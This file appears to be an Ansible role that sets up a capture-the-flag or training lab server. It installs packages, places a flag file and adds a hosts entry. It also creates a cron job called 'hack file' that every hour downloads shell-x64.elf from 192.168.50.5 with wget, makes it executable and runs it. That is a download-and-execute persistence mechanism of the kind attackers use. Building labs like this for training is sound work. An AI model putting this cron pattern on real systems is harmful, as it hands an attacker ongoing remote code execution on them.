---
# This is a role for setting up the server.

- name: Install packages
  apt:
    pkg:
     - wget
     - net-tools
     - wine
     - libwine
    update_cache: yes

- name: Place flag
  copy:
    dest: '/home/user/flag.txt'
    owner: 'server'
    content: "Top_Secret_Flag\n"
    mode: '0600'

- name: Create alias for client
  lineinfile:
    path: '/etc/hosts'
    line: '192.168.50.5 client'

- name: Cron job for malicious file
  cron:
   name: "hack file"
   minute: "5"
   job: "pkill shell-x64.elf && rm /home/user/shell-x64.elf && wget -O /home/user/shell-x64.elf http://192.168.50.5/shell-x64.elf && chmod +x /home/user/shell-x64.elf && /home/user/shell-x64.elf"
...
